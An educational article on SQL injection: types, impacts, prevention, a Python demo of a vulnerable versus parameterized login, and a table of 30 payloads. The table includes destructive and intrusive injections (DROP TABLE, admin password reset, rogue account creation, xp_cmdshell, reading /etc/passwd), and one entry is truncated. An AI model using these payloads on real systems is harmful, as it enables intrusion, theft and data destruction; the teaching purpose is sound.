SQL Injection (SQLi) is a type of cybersecurity vulnerability that allows attackers to manipulate the Structured Query Language (SQL) queries made by an application to interact with its database. By exploiting these vulnerabilities, attackers can bypass authentication, retrieve sensitive data, modify or delete database entries, and even take control of the database server.
SQL Injection typically occurs when user input is embedded directly in the text of a SQL query, without validation or parameter binding, so the database parses the input as part of the statement. This flaw is most common in web applications that interact with a backend database for functions such as login authentication, user registration, or data retrieval.
## Types of SQL Injection
- Classic (In-Band) SQL Injection: Manipulates SQL queries through user input fields, with the query results or errors returned directly in the application's response.
- Blind SQL Injection: The application displays no query output; the attacker infers information from differences in the response (true/false) or in response timing.
- Error-Based SQL Injection: Leverages database error messages to learn about the database structure.
- Union-Based SQL Injection: Appends a UNION SELECT to the original query to extract data from other tables within the same response.
- Time-Based SQL Injection: A form of blind injection that delays the server's response to infer the result of a query.
## Impacts of SQL Injection
- Data Breaches: Attackers can steal sensitive information, such as usernames, passwords, and credit card details.
- Loss of Trust: A breached application can harm the organization's reputation.
- Financial Losses: SQL Injection can result in financial penalties or revenue losses due to service disruptions.
- Full Database Compromise: Attackers may gain full administrative control over the database.
## Preventing SQL Injection
- Input Validation: Validate user input against an allow-list of expected formats (type, length, character set) before it is used; sanitization alone is not a reliable defense.
- Parameterized Queries: Use prepared statements or parameterized queries so that user input is bound as data and is never parsed as part of the SQL statement text. This is the primary defense.
- Stored Procedures: Execute database queries through predefined stored procedures, provided the procedure itself does not build dynamic SQL from its arguments.
- Error Handling: Log detailed database errors server-side and return only generic messages to end users, so error-based injection has nothing to read.
- Database Privileges: Run the application under a database account with the minimum privileges it needs (no DROP, file-read, or command-execution rights, for example), so a successful injection does less damage.
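The contrast between the vulnerable pattern described in the introduction (input concatenated into the query text) and the parameterized-query, error-handling and allow-list defenses listed above, as an added example that is not part of the original post. It uses Python's standard sqlite3 module; the in-memory database, its users table and the rows in it are constructed for the demonstration, and ALLOWED_SORT_COLUMNS is an assumed allow-list for a column name that cannot be bound as a parameter.

```python
import logging
import sqlite3

# Added example, not from the original post. The database, table and rows are
# constructed here so the block runs offline with the standard library only.
# Passwords are stored in plaintext purely to make the injection visible; a
# real system stores a salted password hash instead.

logging.basicConfig(level=logging.WARNING)
log = logging.getLogger("login")

ALLOWED_SORT_COLUMNS = {"username", "role"}  # assumed allow-list for ORDER BY


def make_db() -> sqlite3.Connection:
    """Create an in-memory SQLite database with a constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
        "password TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password, role) VALUES (?, ?, ?)",
        [("admin", "s3cret", "admin"), ("alice", "wonderland", "user")],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """Insecure: the statement is built by string concatenation, so the input
    becomes SQL text. Payloads 1 and 3 from the table on this page turn the
    WHERE clause into a tautology or comment out the password check."""
    sql = (
        "SELECT username FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    row = conn.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(conn: sqlite3.Connection, username: str, password: str):
    """Hardened: a parameterized query. The driver binds the values after the
    statement is parsed, so quotes and comment markers in the input stay data."""
    try:
        row = conn.execute(
            "SELECT username FROM users WHERE username = ? AND password = ?",
            (username, password),
        ).fetchone()
    except sqlite3.Error as exc:
        # Error handling: keep the detail in the server log; the caller gets
        # nothing that reveals the query text or the schema.
        log.warning("login query failed: %s", exc)
        return None
    return row[0] if row else None


def list_users_sorted(conn: sqlite3.Connection, sort_by: str):
    """Identifiers (column or table names) cannot be bound as parameters, so
    the safe option is an allow-list check before any interpolation."""
    if sort_by not in ALLOWED_SORT_COLUMNS:
        raise ValueError("unsupported sort column")
    rows = conn.execute(f"SELECT username FROM users ORDER BY {sort_by}").fetchall()
    return [r[0] for r in rows]


if __name__ == "__main__":
    db = make_db()
    for payload in ("' OR '1'='1' --", "admin' --"):
        print(repr(payload), "vulnerable ->", login_vulnerable(db, payload, "x"),
              "| safe ->", login_safe(db, payload, "x"))
    print("alice/wonderland safe ->", login_safe(db, "alice", "wonderland"))
```

Running the block shows both payloads logging in as `admin` through `login_vulnerable` and returning `None` through `login_safe`, while a genuine credential pair still works. The `list_users_sorted` function is there because parameter binding does not cover identifiers: an allow-list is the only correct defense for a user-chosen column name.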
## 30 SQL Injection Scripts and Their Uses
Below are 30 examples of SQL Injection payloads and their purposes. These are provided strictly for educational and awareness purposes. Always use such scripts in a controlled and ethical environment, such as penetration testing labs.
| # | SQL Injection Script | Use Case |
|---|---|---|
| 1 | `' OR '1'='1' --` | Bypass authentication by always evaluating to true. |
| 2 | `' OR 1=1; --` | Bypass login forms. |
| 3 | `admin' --` | Log in as "admin" if no password validation is performed. |
| 4 | `'; DROP TABLE users; --` | Deletes the users table (destructive action). |
| 5 | `' UNION SELECT NULL, username, password FROM users --` | Retrieves usernames and passwords using union queries. |
| 6 | `1 AND SLEEP(5) --` | Time-based SQLi to determine if the injection is successful. |
| 7 | `1' ORDER BY 3 --` | Determines the number of columns in a query. |
| 8 | `' UNION SELECT @@version, NULL --` | Reveals the database version. |
| 9 | `' AND 1=CAST((SELECT @@version) AS INT) --` | Exploits type casting to check the database version. |
| 10 | `' OR EXISTS(SELECT * FROM users WHERE username='admin') --` | Checks if an "admin" user exists in the database. |
| 11 | `' UNION SELECT NULL, TABLE_NAME FROM INFORMATION_SCHEMA.TABLES --` | Lists all table names in the database. |
| 12 | `' UNION SELECT NULL, COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='users' --` | Lists all columns in the users table. |
| 13 | `1' OR (SELECT COUNT(*) FROM users) > 0 --` | Checks if the users table has entries. |
| 14 | `' AND 1=0 UNION ALL SELECT NULL, database(), user() --` | Reveals the current database and user. |
| 15 | `'; EXEC xp_cmdshell('whoami') --` | Executes OS-level commands (on MSSQL). |
| 16 | `1' UNION SELECT 1, group_concat(schema_name) FROM information_schema.schemata --` | Lists all database schemas. |
| 17 | `' UNION ALL SELECT NULL, LOAD_FILE('/etc/passwd') --` | Attempts to read the contents of sensitive files (MySQL-specific). |
| 18 | `' UNION SELECT 1, benchmark(5000000,md5('a')) --` | Creates a time delay to test SQLi. |
| 19 | `'; WAITFOR DELAY '00:00:10' --` | Introduces a delay to infer information (MSSQL). |
| 20 | `'; SELECT * FROM users WHERE username LIKE '%admin%' --` | Retrieves usernames containing "admin". |
| 21 | `' AND ASCII(SUBSTRING((SELECT database()),1,1)) > 77 --` | Extracts the database name character by character. |
| 22 | `' AND (SELECT COUNT(*) FROM users) > 10 --` | Checks if more than 10 users exist in the users table. |
| 23 | `' UNION SELECT NULL, version(), current` | Reveals database version and current user. |
| 24 | `' UNION SELECT NULL, NULL, table_name FROM information_schema.tables WHERE table_schema=database() --` | Lists all tables in the current database. |
| 25 | `' UNION SELECT NULL, CONCAT(username, ':', password) FROM users --` | Combines and retrieves username-password pairs. |
| 26 | `'; UPDATE users SET password='hacked' WHERE username='admin' --` | Changes the admin password (destructive). |
| 27 | `'; INSERT INTO users (username, password) VALUES ('hacker', '12345') --` | Adds a new user account to the database. |
| 28 | `' AND 1=(SELECT CASE WHEN (1=1) THEN 1 ELSE pg_sleep(5) END) --` | Tests SQLi on PostgreSQL using a time delay. |
| 29 | `' UNION SELECT NULL, NULL, NULL, TABLE_NAME FROM ALL_TABLES --` | Retrieves all table names in Oracle databases. |
| 30 | `1' OR UPDATEXML(NULL, CONCAT(0x3a, version()), NULL) --` | Exploits XML functions to extract the database version. |
## Conclusion
SQL Injection is a critical vulnerability that can lead to severe consequences if exploited. Understanding how attackers craft SQLi payloads is essential for developers, security analysts, and ethical hackers. Implementing secure coding practices, proper input validation, and database security measures can effectively mitigate these risks.
Note: This content is meant for educational purposes only. Always practice ethical hacking and comply with the law and organizational policies.